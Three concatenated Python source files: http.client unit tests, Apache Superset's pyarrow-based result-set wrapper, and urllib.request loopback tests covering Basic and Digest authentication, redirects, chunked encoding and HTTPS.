            'hello world\r\n'
            '1\r\n'
            'd\r\n'
        )
        sock = FakeSocket(chunked_start + '0\r\n')
        resp = client.HTTPResponse(sock, method="HEAD")
        resp.begin()
        self.assertEqual(resp.read(), b'')
        self.assertEqual(resp.status, 200)
        self.assertEqual(resp.reason, 'OK')
        self.assertTrue(resp.isclosed())

    def test_negative_content_length(self):
        # A negative Content-Length is treated as "read until EOF".
        sock = FakeSocket('HTTP/1.1 200 OK\r\n'
                          'Content-Length: -1\r\n\r\nHello\r\n')
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), b'Hello\r\n')
        self.assertTrue(resp.isclosed())

    def test_incomplete_read(self):
        sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        try:
            resp.read()
        except client.IncompleteRead as i:
            self.assertEqual(i.partial, b'Hello\r\n')
            self.assertEqual(repr(i),
                             "IncompleteRead(7 bytes read, 3 more expected)")
            self.assertEqual(str(i),
                             "IncompleteRead(7 bytes read, 3 more expected)")
            self.assertTrue(resp.isclosed())
        else:
            self.fail('IncompleteRead expected')

    def test_epipe(self):
        # EPipeSocket raises EPIPE while the request is being sent, but the
        # already-received response must still be parseable.
        sock = EPipeSocket(
            "HTTP/1.0 401 Authorization Required\r\n"
            "Content-type: text/html\r\n"
            "WWW-Authenticate: Basic realm=\"example\"\r\n",
            b"Content-Length")
        conn = client.HTTPConnection("example.com")
        conn.sock = sock
        self.assertRaises(socket.error,
                          lambda: conn.request("PUT", "/url", "body"))
        resp = conn.getresponse()
        self.assertEqual(401, resp.status)
        self.assertEqual("Basic realm=\"example\"",
                         resp.getheader("www-authenticate"))

    def test_filenoattr(self):
        # Just test the fileno attribute in the HTTPResponse Object.
        body = "HTTP/1.1 200 Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        self.assertTrue(hasattr(resp,'fileno'),
                        'HTTPResponse should expose a fileno attribute')

    # Test lines overflowing the max line size (_MAXLINE in http.client)

    def test_overflowing_status_line(self):
        self.skipTest("disabled for HTTP 0.9 support")
        body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
        resp = client.HTTPResponse(FakeSocket(body))
        self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)

    def test_overflowing_header_line(self):
        body = (
            'HTTP/1.1 200 OK\r\n'
            'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
        )
        resp = client.HTTPResponse(FakeSocket(body))
        self.assertRaises(client.LineTooLong, resp.begin)

    def test_overflowing_chunked_line(self):
        body = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            + '0' * 65536 + 'a\r\n'
            'hello world\r\n'
            '0\r\n'
        )
        resp = client.HTTPResponse(FakeSocket(body))
        resp.begin()
        self.assertRaises(client.LineTooLong, resp.read)

    def test_early_eof(self):
        # Test httpresponse with no \r\n termination,
        body = "HTTP/1.1 200 Ok"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(), b'')
        self.assertTrue(resp.isclosed())
class OfflineTest(TestCase):
    """Checks that need no socket, fake or real."""

    def test_responses(self):
        # The standard reason phrase for 404 is exposed via client.responses.
        self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
class SourceAddressTest(TestCase):
    """Tests for the source_address constructor argument (uses real sockets)."""

    def setUp(self):
        # A real listening server socket plus a known-free local port to
        # bind the client side to.
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.port = support.bind_port(self.serv)
        self.source_port = support.find_unused_port()
        self.serv.listen(5)
        self.conn = None

    def tearDown(self):
        if self.conn:
            self.conn.close()
            self.conn = None
        self.serv.close()
        self.serv = None

    def testHTTPConnectionSourceAddress(self):
        self.conn = client.HTTPConnection(HOST, self.port,
                                          source_address=('', self.source_port))
        self.conn.connect()
        # The client socket must be bound to the requested source port.
        self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)

    @unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
                     'http.client.HTTPSConnection not defined')
    def testHTTPSConnectionSourceAddress(self):
        self.conn = client.HTTPSConnection(HOST, self.port,
                                           source_address=('', self.source_port))
        # We don't test anything here other the constructor not barfing as
        # this code doesn't deal with setting up an active running SSL server
        # for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
    # Listening port of the per-test server, set in setUp().
    PORT = None

    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        TimeoutTest.PORT = support.bind_port(self.serv)
        self.serv.listen(5)

    def tearDown(self):
        self.serv.close()
        self.serv = None

    def testTimeoutAttribute(self):
        '''This will prove that the timeout gets through
        HTTPConnection and into the socket.
        '''
        # default -- use global socket timeout
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
            httpConn.connect()
        finally:
            # Always restore the process-wide default, even on failure.
            socket.setdefaulttimeout(None)
        self.assertEqual(httpConn.sock.gettimeout(), 30)
        httpConn.close()

        # no timeout -- do not use global socket default
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
                                             timeout=None)
            httpConn.connect()
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(httpConn.sock.gettimeout(), None)
        httpConn.close()

        # a value
        httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
        httpConn.connect()
        self.assertEqual(httpConn.sock.gettimeout(), 30)
        httpConn.close()
class HTTPSTest(TestCase):
    """Constructor-level checks for HTTPSConnection (no TLS handshake)."""

    def test_attributes(self):
        # simple test to check it's storing it
        if hasattr(client, 'HTTPSConnection'):
            h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
            self.assertEqual(h.timeout, 30)

    @unittest.skipIf(not hasattr(client, 'HTTPSConnection'), 'http.client.HTTPSConnection not available')
    def test_host_port(self):
        # Check invalid host_port
        # Note that httplib does not accept user:password@ in the host-port.
        for hp in ("www.python.org:abc", "user:password@www.python.org"):
            self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)

        # Valid host-port forms; HTTPS defaults to port 443.
        for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000", "fe80::207:e9ff:fe9b",
                          8000),
                         ("pypi.python.org:443", "pypi.python.org", 443),
                         ("pypi.python.org", "pypi.python.org", 443),
                         ("pypi.python.org:", "pypi.python.org", 443),
                         ("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443)):
            c = client.HTTPSConnection(hp)
            self.assertEqual(h, c.host)
            self.assertEqual(p, c.port)
def test_main(verbose=None):
    """Run this module's test classes via test.support."""
    support.run_unittest(HeaderTests, OfflineTest, BasicTest, TimeoutTest,
                         HTTPSTest, SourceAddressTest)

if __name__ == '__main__':
    test_main()
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Superset wrapper around pyarrow.Table.
"""
import datetime
import json
import logging
from typing import Any, Dict, List, Optional, Tuple, Type
import numpy as np
import pandas as pd
import pyarrow as pa
from superset import db_engine_specs
from superset.typing import DbapiDescription, DbapiResult
from superset.utils import core as utils
logger = logging.getLogger(__name__)
def dedup(l: List[str], suffix: str = "__", case_sensitive: bool = True) -> List[str]:
    """De-duplicates a list of string by suffixing a counter

    Always returns the same number of entries as provided, and always returns
    unique values. Case sensitive comparison by default.

    >>> print(','.join(dedup(['foo', 'bar', 'bar', 'bar', 'Bar'])))
    foo,bar,bar__1,bar__2,Bar
    >>> print(
        ','.join(dedup(['foo', 'bar', 'bar', 'bar', 'Bar'], case_sensitive=False))
    )
    foo,bar,bar__1,bar__2,Bar__3
    """
    result: List[str] = []
    occurrences: Dict[str, int] = {}
    for name in l:
        # Count duplicates on the (optionally lowercased) key, but suffix
        # the name in its original casing.
        key = name if case_sensitive else name.lower()
        if key in occurrences:
            occurrences[key] += 1
            name = name + suffix + str(occurrences[key])
        else:
            occurrences[key] = 0
        result.append(name)
    return result
def stringify(obj: Any) -> str:
    """Serialize *obj* to a JSON string; values json can't natively encode
    are handed to Superset's ``utils.json_iso_dttm_ser`` fallback."""
    return json.dumps(obj, default=utils.json_iso_dttm_ser)
def stringify_values(array: np.ndarray) -> np.ndarray:
    """Apply :func:`stringify` element-wise over *array*.

    ``np.vectorize`` keeps the input's shape while converting every element
    to its JSON string form.
    """
    return np.vectorize(stringify)(array)
def destringify(obj: str) -> Any:
    """Parse a JSON string back into a Python object (counterpart of
    :func:`stringify`)."""
    return json.loads(obj)
class SupersetResultSet:
    """Superset wrapper around a DB-API result set.

    Normalizes the driver's rows into a ``pyarrow.Table`` (with de-duplicated
    column names) and keeps a per-column map of database types derived from
    the cursor description.
    """

    def __init__(  # pylint: disable=too-many-locals,too-many-branches
        self,
        data: DbapiResult,
        cursor_description: DbapiDescription,
        db_engine_spec: Type[db_engine_specs.BaseEngineSpec],
    ):
        self.db_engine_spec = db_engine_spec
        data = data or []
        column_names: List[str] = []
        pa_data: List[pa.Array] = []
        deduped_cursor_desc: List[Tuple[Any, ...]] = []
        numpy_dtype: List[Tuple[str, ...]] = []
        stringified_arr: np.ndarray

        if cursor_description:
            # get deduped list of column names
            column_names = dedup([col[0] for col in cursor_description])

            # fix cursor descriptor with the deduped names
            deduped_cursor_desc = [
                tuple([column_name, *list(description)[1:]])
                for column_name, description in zip(column_names, cursor_description)
            ]

            # generate numpy structured array dtype
            numpy_dtype = [(column_name, "object") for column_name in column_names]

        # only do expensive recasting if datatype is not standard list of tuples
        if data and (not isinstance(data, list) or not isinstance(data[0], tuple)):
            data = [tuple(row) for row in data]
        array = np.array(data, dtype=numpy_dtype)
        if array.size > 0:
            for column in column_names:
                try:
                    pa_data.append(pa.array(array[column].tolist()))
                except (
                    pa.lib.ArrowInvalid,
                    pa.lib.ArrowTypeError,
                    pa.lib.ArrowNotImplementedError,
                    TypeError,  # this is super hacky,
                    # https://issues.apache.org/jira/browse/ARROW-7855
                ):
                    # attempt serialization of values as strings
                    stringified_arr = stringify_values(array[column])
                    pa_data.append(pa.array(stringified_arr.tolist()))

        if pa_data:  # pylint: disable=too-many-nested-blocks
            for i, column in enumerate(column_names):
                if pa.types.is_nested(pa_data[i].type):
                    # TODO: revisit nested column serialization once nested types
                    # are added as a natively supported column type in Superset
                    # (superset.utils.core.GenericDataType).
                    stringified_arr = stringify_values(array[column])
                    pa_data[i] = pa.array(stringified_arr.tolist())
                elif pa.types.is_temporal(pa_data[i].type):
                    # workaround for bug converting
                    # `psycopg2.tz.FixedOffsetTimezone` tzinfo values.
                    # related: https://issues.apache.org/jira/browse/ARROW-5248
                    sample = self.first_nonempty(array[column])
                    if sample and isinstance(sample, datetime.datetime):
                        try:
                            if sample.tzinfo:
                                # Re-localize the whole column to the sample's
                                # tz before handing it to pyarrow.
                                tz = sample.tzinfo
                                series = pd.Series(
                                    array[column], dtype="datetime64[ns]"
                                )
                                series = pd.to_datetime(series).dt.tz_localize(tz)
                                pa_data[i] = pa.Array.from_pandas(
                                    series, type=pa.timestamp("ns", tz=tz)
                                )
                        except Exception as ex:  # pylint: disable=broad-except
                            logger.exception(ex)

        self.table = pa.Table.from_arrays(pa_data, names=column_names)
        self._type_dict: Dict[str, Any] = {}
        try:
            # The driver may not be passing a cursor.description
            self._type_dict = {
                col: db_engine_spec.get_datatype(deduped_cursor_desc[i][1])
                for i, col in enumerate(column_names)
                if deduped_cursor_desc
            }
        except Exception as ex:  # pylint: disable=broad-except
            logger.exception(ex)

    @staticmethod
    def convert_pa_dtype(pa_dtype: pa.DataType) -> Optional[str]:
        """Map a pyarrow dtype onto a coarse generic type name, or None."""
        if pa.types.is_boolean(pa_dtype):
            return "BOOL"
        if pa.types.is_integer(pa_dtype):
            return "INT"
        if pa.types.is_floating(pa_dtype):
            return "FLOAT"
        if pa.types.is_string(pa_dtype):
            return "STRING"
        if pa.types.is_temporal(pa_dtype):
            return "DATETIME"
        return None

    @staticmethod
    def convert_table_to_df(table: pa.Table) -> pd.DataFrame:
        """Convert the pyarrow table to pandas; ``integer_object_nulls=True``
        keeps nullable integer columns as objects instead of floats."""
        return table.to_pandas(integer_object_nulls=True)

    @staticmethod
    def first_nonempty(items: List[Any]) -> Any:
        """Return the first truthy element of *items*, or None."""
        return next((i for i in items if i), None)

    def is_temporal(self, db_type_str: Optional[str]) -> bool:
        # Delegate to the engine spec; unknown types count as non-temporal.
        column_spec = self.db_engine_spec.get_column_spec(db_type_str)
        if column_spec is None:
            return False
        return column_spec.is_dttm

    def data_type(self, col_name: str, pa_dtype: pa.DataType) -> Optional[str]:
        """Given a pyarrow data type, Returns a generic database type"""
        # Prefer the type reported by the DB driver; fall back to mapping
        # the pyarrow dtype.
        set_type = self._type_dict.get(col_name)
        if set_type:
            return set_type

        mapped_type = self.convert_pa_dtype(pa_dtype)
        if mapped_type:
            return mapped_type

        return None

    def to_pandas_df(self) -> pd.DataFrame:
        return self.convert_table_to_df(self.table)

    @property
    def pa_table(self) -> pa.Table:
        return self.table

    @property
    def size(self) -> int:
        # Number of rows in the result set.
        return self.table.num_rows

    @property
    def columns(self) -> List[Dict[str, Any]]:
        """Describe each column: name, generic type and temporal flag."""
        if not self.table.column_names:
            return []

        columns = []
        for col in self.table.schema:
            db_type_str = self.data_type(col.name, col.type)
            column = {
                "name": col.name,
                "type": db_type_str,
                "is_date": self.is_temporal(db_type_str),
            }
            columns.append(column)

        return columns
| |
import base64
import os
import email
import urllib.parse
import urllib.request
import http.server
import threading
import unittest
import hashlib
from test import support
try:
import ssl
except ImportError:
ssl = None
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Loopback http server infrastructure
class LoopbackHttpServer(http.server.HTTPServer):
    """HTTP server w/ a few modifications that make it useful for
    loopback testing purposes.
    """

    def __init__(self, server_address, RequestHandlerClass):
        http.server.HTTPServer.__init__(self,
                                        server_address,
                                        RequestHandlerClass)

        # Set the timeout of our listening socket really low so
        # that we can stop the server easily.
        self.socket.settimeout(0.1)

    def get_request(self):
        """HTTPServer method, overridden."""

        request, client_address = self.socket.accept()

        # It's a loopback connection, so setting the timeout
        # really low shouldn't affect anything, but should make
        # deadlocks less likely to occur.
        request.settimeout(10.0)

        return (request, client_address)
class LoopbackHttpServerThread(threading.Thread):
    """Stoppable thread that runs a loopback http server."""

    def __init__(self, request_handler):
        threading.Thread.__init__(self)
        self._stop_server = False
        self.ready = threading.Event()
        request_handler.protocol_version = "HTTP/1.0"
        # Port 0 lets the OS pick a free port; record the one chosen.
        self.httpd = LoopbackHttpServer(("127.0.0.1", 0),
                                        request_handler)
        self.port = self.httpd.server_port

    def stop(self):
        """Stops the webserver if it's currently running."""
        # Flag the serving loop to exit and wait for the thread before
        # closing the listening socket.
        self._stop_server = True
        self.join()
        self.httpd.server_close()

    def run(self):
        self.ready.set()
        while not self._stop_server:
            self.httpd.handle_request()
# Authentication infrastructure
class DigestAuthHandler:
    """Handler for performing digest authentication."""

    def __init__(self):
        self._request_num = 0         # running counter feeding nonce generation
        self._nonces = []             # nonces issued but not yet consumed
        self._users = {}              # username -> password; empty disables auth
        self._realm_name = "Test Realm"
        self._qop = "auth"

    def set_qop(self, qop):
        self._qop = qop

    def set_users(self, users):
        assert isinstance(users, dict)
        self._users = users

    def set_realm(self, realm):
        self._realm_name = realm

    def _generate_nonce(self):
        # One fresh nonce per challenge: MD5 of the running request counter.
        self._request_num += 1
        nonce = hashlib.md5(str(self._request_num).encode("ascii")).hexdigest()
        self._nonces.append(nonce)
        return nonce

    def _create_auth_dict(self, auth_str):
        # Parse 'Digest k1=v1, k2="v2", ...' into a dict, dropping the
        # leading scheme token and unquoting quoted values.
        first_space_index = auth_str.find(" ")
        auth_str = auth_str[first_space_index+1:]

        parts = auth_str.split(",")

        auth_dict = {}
        for part in parts:
            name, value = part.split("=")
            name = name.strip()
            if value[0] == '"' and value[-1] == '"':
                value = value[1:-1]
            else:
                value = value.strip()
            auth_dict[name] = value
        return auth_dict

    def _validate_auth(self, auth_dict, password, method, uri):
        # Digest response check (RFC 2617 style):
        # HA1 = MD5(user:realm:password), HA2 = MD5(method:uri),
        # response = MD5(HA1:nonce:nc:cnonce:qop:HA2).
        final_dict = {}
        final_dict.update(auth_dict)
        final_dict["password"] = password
        final_dict["method"] = method
        final_dict["uri"] = uri
        HA1_str = "%(username)s:%(realm)s:%(password)s" % final_dict
        HA1 = hashlib.md5(HA1_str.encode("ascii")).hexdigest()
        HA2_str = "%(method)s:%(uri)s" % final_dict
        HA2 = hashlib.md5(HA2_str.encode("ascii")).hexdigest()
        final_dict["HA1"] = HA1
        final_dict["HA2"] = HA2
        response_str = "%(HA1)s:%(nonce)s:%(nc)s:" \
                       "%(cnonce)s:%(qop)s:%(HA2)s" % final_dict
        response = hashlib.md5(response_str.encode("ascii")).hexdigest()

        return response == auth_dict["response"]

    def _return_auth_challenge(self, request_handler):
        # 407 challenge carrying realm, qop and a fresh nonce.
        request_handler.send_response(407, "Proxy Authentication Required")
        request_handler.send_header("Content-Type", "text/html")
        request_handler.send_header(
            'Proxy-Authenticate', 'Digest realm="%s", '
            'qop="%s",'
            'nonce="%s", ' % \
            (self._realm_name, self._qop, self._generate_nonce()))
        # XXX: Not sure if we're supposed to add this next header or
        # not.
        #request_handler.send_header('Connection', 'close')
        request_handler.end_headers()
        request_handler.wfile.write(b"Proxy Authentication Required.")
        return False

    def handle_request(self, request_handler):
        """Performs digest authentication on the given HTTP request
        handler.  Returns True if authentication was successful, False
        otherwise.

        If no users have been set, then digest auth is effectively
        disabled and this method will always return True.
        """
        if len(self._users) == 0:
            return True

        if "Proxy-Authorization" not in request_handler.headers:
            return self._return_auth_challenge(request_handler)
        else:
            auth_dict = self._create_auth_dict(
                request_handler.headers["Proxy-Authorization"]
                )
            if auth_dict["username"] in self._users:
                password = self._users[ auth_dict["username"] ]
            else:
                return self._return_auth_challenge(request_handler)
            # Each nonce may only be used once; unknown nonces re-challenge.
            if not auth_dict.get("nonce") in self._nonces:
                return self._return_auth_challenge(request_handler)
            else:
                self._nonces.remove(auth_dict["nonce"])

            auth_validated = False

            # MSIE uses short_path in its validation, but Python's
            # urllib.request uses the full path, so we're going to see if
            # either of them works here.

            for path in [request_handler.path, request_handler.short_path]:
                if self._validate_auth(auth_dict,
                                       password,
                                       request_handler.command,
                                       path):
                    auth_validated = True

            if not auth_validated:
                return self._return_auth_challenge(request_handler)
            return True
class BasicAuthHandler(http.server.BaseHTTPRequestHandler):
    """Handler for performing basic authentication."""

    # Server side values
    USER = 'testUser'
    PASSWD = 'testPass'
    REALM = 'Test'

    USER_PASSWD = "%s:%s" % (USER, PASSWD)
    ENCODED_AUTH = base64.b64encode(USER_PASSWD.encode('ascii')).decode('ascii')

    def __init__(self, *args, **kwargs):
        http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)

    def log_message(self, format, *args):
        # Keep the test output clean: drop request logging entirely.
        pass

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

    def do_AUTHHEAD(self):
        # 401 challenge advertising our Basic realm.
        self.send_response(401)
        self.send_header("WWW-Authenticate", "Basic realm=\"%s\"" % self.REALM)
        self.send_header("Content-type", "text/html")
        self.end_headers()

    def do_GET(self):
        supplied = self.headers.get("Authorization", "")
        if not supplied:
            self.do_AUTHHEAD()
            self.wfile.write(b"No Auth header received")
        elif supplied == "Basic " + self.ENCODED_AUTH:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"It works")
        else:
            # Request Unauthorized
            self.do_AUTHHEAD()
# Proxy test infrastructure
class FakeProxyHandler(http.server.BaseHTTPRequestHandler):
    """This is a 'fake proxy' that makes it look like the entire
    internet has gone down due to a sudden zombie invasion.  Its main
    utility is in providing us with authentication support for
    testing.
    """

    def __init__(self, digest_auth_handler, *args, **kwargs):
        # This has to be set before calling our parent's __init__(), which will
        # try to call do_GET().
        self.digest_auth_handler = digest_auth_handler
        http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)

    def log_message(self, format, *args):
        # Uncomment the next line for debugging.
        # sys.stderr.write(format % args)
        pass

    def do_GET(self):
        # Expose the path component alone for MSIE-style digest validation.
        parsed = urllib.parse.urlparse(self.path, "http")
        self.short_path = parsed[2]
        if self.digest_auth_handler.handle_request(self):
            self.send_response(200, "OK")
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(bytes("You've reached %s!<BR>" % self.path,
                                   "ascii"))
            self.wfile.write(b"Our apologies, but our server is down due to "
                             b"a sudden zombie invasion.")
# Test cases
class BasicAuthTests(unittest.TestCase):
    """End-to-end Basic auth tests against a loopback BasicAuthHandler."""

    USER = "testUser"
    PASSWD = "testPass"
    INCORRECT_PASSWD = "Incorrect"
    REALM = "Test"

    def setUp(self):
        super(BasicAuthTests, self).setUp()
        # With Basic Authentication
        def http_server_with_basic_auth_handler(*args, **kwargs):
            return BasicAuthHandler(*args, **kwargs)
        self.server = LoopbackHttpServerThread(http_server_with_basic_auth_handler)
        self.addCleanup(self.stop_server)
        self.server_url = 'http://127.0.0.1:%s' % self.server.port
        self.server.start()
        self.server.ready.wait()

    def stop_server(self):
        self.server.stop()
        self.server = None

    def tearDown(self):
        super(BasicAuthTests, self).tearDown()

    def test_basic_auth_success(self):
        ah = urllib.request.HTTPBasicAuthHandler()
        ah.add_password(self.REALM, self.server_url, self.USER, self.PASSWD)
        urllib.request.install_opener(urllib.request.build_opener(ah))
        try:
            self.assertTrue(urllib.request.urlopen(self.server_url))
        except urllib.error.HTTPError:
            self.fail("Basic auth failed for the url: %s" % self.server_url)

    def test_basic_auth_httperror(self):
        # A wrong password must surface as an HTTPError (401 repeats).
        ah = urllib.request.HTTPBasicAuthHandler()
        ah.add_password(self.REALM, self.server_url, self.USER, self.INCORRECT_PASSWD)
        urllib.request.install_opener(urllib.request.build_opener(ah))
        self.assertRaises(urllib.error.HTTPError, urllib.request.urlopen, self.server_url)
class ProxyAuthTests(unittest.TestCase):
    """Digest proxy-auth tests against the loopback FakeProxyHandler."""

    URL = "http://localhost"

    USER = "tester"
    PASSWD = "test123"
    REALM = "TestRealm"

    @support.requires_hashdigest("md5")
    def setUp(self):
        super(ProxyAuthTests, self).setUp()
        # Ignore proxy bypass settings in the environment.
        def restore_environ(old_environ):
            os.environ.clear()
            os.environ.update(old_environ)
        self.addCleanup(restore_environ, os.environ.copy())
        os.environ['NO_PROXY'] = ''
        os.environ['no_proxy'] = ''

        self.digest_auth_handler = DigestAuthHandler()
        self.digest_auth_handler.set_users({self.USER: self.PASSWD})
        self.digest_auth_handler.set_realm(self.REALM)

        # With Digest Authentication.
        def create_fake_proxy_handler(*args, **kwargs):
            return FakeProxyHandler(self.digest_auth_handler, *args, **kwargs)

        self.server = LoopbackHttpServerThread(create_fake_proxy_handler)
        self.addCleanup(self.stop_server)
        self.server.start()
        self.server.ready.wait()
        proxy_url = "http://127.0.0.1:%d" % self.server.port
        handler = urllib.request.ProxyHandler({"http" : proxy_url})
        self.proxy_digest_handler = urllib.request.ProxyDigestAuthHandler()
        self.opener = urllib.request.build_opener(
            handler, self.proxy_digest_handler)

    def stop_server(self):
        self.server.stop()
        self.server = None

    def test_proxy_with_bad_password_raises_httperror(self):
        self.proxy_digest_handler.add_password(self.REALM, self.URL,
                                               self.USER, self.PASSWD+"bad")
        self.digest_auth_handler.set_qop("auth")
        self.assertRaises(urllib.error.HTTPError,
                          self.opener.open,
                          self.URL)

    def test_proxy_with_no_password_raises_httperror(self):
        self.digest_auth_handler.set_qop("auth")
        self.assertRaises(urllib.error.HTTPError,
                          self.opener.open,
                          self.URL)

    def test_proxy_qop_auth_works(self):
        self.proxy_digest_handler.add_password(self.REALM, self.URL,
                                               self.USER, self.PASSWD)
        self.digest_auth_handler.set_qop("auth")
        with self.opener.open(self.URL) as result:
            while result.read():
                pass

    def test_proxy_qop_auth_int_works_or_throws_urlerror(self):
        self.proxy_digest_handler.add_password(self.REALM, self.URL,
                                               self.USER, self.PASSWD)
        self.digest_auth_handler.set_qop("auth-int")
        try:
            result = self.opener.open(self.URL)
        except urllib.error.URLError:
            # It's okay if we don't support auth-int, but we certainly
            # shouldn't receive any kind of exception here other than
            # a URLError.
            pass
        else:
            with result:
                while result.read():
                    pass
def GetRequestHandler(responses):
    """Build a BaseHTTPRequestHandler subclass that replays the canned
    (status, headers, body) triples in *responses*, one per request, and
    records what it received in class attributes for later inspection."""

    class FakeHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
        server_version = "TestHTTP/"
        # Class-level so tests can inspect them via the returned class.
        requests = []
        headers_received = []
        port = 80

        def do_GET(self):
            remaining = self.send_head()
            # Keep writing until the whole body has been pushed out.
            while remaining:
                written = self.wfile.write(remaining)
                remaining = remaining[written:]

        def do_POST(self):
            length = int(self.headers["Content-Length"])
            payload = self.rfile.read(length)
            self.do_GET()
            self.requests.append(payload)

        def send_head(self):
            # Record the request before consuming the next canned response.
            FakeHTTPRequestHandler.headers_received = self.headers
            self.requests.append(self.path)
            status, headers, body = responses.pop(0)
            self.send_response(status)
            for header, value in headers:
                self.send_header(header, value % {'port':self.port})
            if not body:
                self.end_headers()
                return None
            self.send_header("Content-type", "text/plain")
            self.end_headers()
            return body

        def log_message(self, *args):
            # Silence per-request logging during the test run.
            pass

    return FakeHTTPRequestHandler
class TestUrlopen(unittest.TestCase):
    """Tests urllib.request.urlopen using the network.
    These tests are not exhaustive. Assuming that testing using files does a
    good job overall of some of the basic interface features. There are no
    tests exercising the optional 'data' and 'proxies' arguments. No tests
    for transparent redirection have been written.
    """
    def setUp(self):
        super(TestUrlopen, self).setUp()
        # Ignore proxies for localhost tests.
        def restore_environ(old_environ):
            os.environ.clear()
            os.environ.update(old_environ)
        self.addCleanup(restore_environ, os.environ.copy())
        os.environ['NO_PROXY'] = '*'
        os.environ['no_proxy'] = '*'
    def urlopen(self, url, data=None, **kwargs):
        # Helper: open the URL and exercise several read APIs, returning
        # everything read as one bytes object.
        l = []
        f = urllib.request.urlopen(url, data, **kwargs)
        try:
            # Exercise various methods
            l.extend(f.readlines(200))
            l.append(f.readline())
            l.append(f.read(1024))
            l.append(f.read())
        finally:
            f.close()
        return b"".join(l)
    def stop_server(self):
        self.server.stop()
        self.server = None
    def start_server(self, responses=None):
        # Start a loopback HTTP server replaying canned responses; returns
        # the handler class so tests can inspect recorded requests.
        if responses is None:
            responses = [(200, [], b"we don't care")]
        handler = GetRequestHandler(responses)
        self.server = LoopbackHttpServerThread(handler)
        self.addCleanup(self.stop_server)
        self.server.start()
        self.server.ready.wait()
        port = self.server.port
        handler.port = port
        return handler
    def start_https_server(self, responses=None, **kwargs):
        # Same as start_server but over TLS; skipped without ssl support.
        if not hasattr(urllib.request, 'HTTPSHandler'):
            self.skipTest('ssl support required')
        from test.ssl_servers import make_https_server
        if responses is None:
            responses = [(200, [], b"we care a bit")]
        handler = GetRequestHandler(responses)
        server = make_https_server(self, handler_class=handler, **kwargs)
        handler.port = server.port
        return handler
    def test_redirection(self):
        # A 302 must be followed transparently to the final 200.
        expected_response = b"We got here..."
        responses = [
            (302, [("Location", "http://localhost:%(port)s/somewhere_else")],
             ""),
            (200, [], expected_response)
        ]
        handler = self.start_server(responses)
        data = self.urlopen("http://localhost:%s/" % handler.port)
        self.assertEqual(data, expected_response)
        self.assertEqual(handler.requests, ["/", "/somewhere_else"])
    def test_chunked(self):
        # The chunked body below decodes to b"hello world".
        expected_response = b"hello world"
        chunked_start = (
            b'a\r\n'
            b'hello worl\r\n'
            b'1\r\n'
            b'd\r\n'
            b'0\r\n'
        )
        response = [(200, [("Transfer-Encoding", "chunked")], chunked_start)]
        handler = self.start_server(response)
        data = self.urlopen("http://localhost:%s/" % handler.port)
        self.assertEqual(data, expected_response)
    def test_404(self):
        # The error body must still be readable from the HTTPError object.
        expected_response = b"Bad bad bad..."
        handler = self.start_server([(404, [], expected_response)])
        try:
            self.urlopen("http://localhost:%s/weeble" % handler.port)
        except urllib.error.URLError as f:
            data = f.read()
            f.close()
        else:
            self.fail("404 should raise URLError")
        self.assertEqual(data, expected_response)
        self.assertEqual(handler.requests, ["/weeble"])
    def test_200(self):
        expected_response = b"pycon 2008..."
        handler = self.start_server([(200, [], expected_response)])
        data = self.urlopen("http://localhost:%s/bizarre" % handler.port)
        self.assertEqual(data, expected_response)
        self.assertEqual(handler.requests, ["/bizarre"])
    def test_200_with_parameters(self):
        # POST data is recorded by the handler after the request path.
        expected_response = b"pycon 2008..."
        handler = self.start_server([(200, [], expected_response)])
        data = self.urlopen("http://localhost:%s/bizarre" % handler.port,
                            b"get=with_feeling")
        self.assertEqual(data, expected_response)
        self.assertEqual(handler.requests, ["/bizarre", b"get=with_feeling"])
    def test_https(self):
        handler = self.start_https_server()
        context = ssl.create_default_context(cafile=CERT_localhost)
        data = self.urlopen("https://localhost:%s/bizarre" % handler.port, context=context)
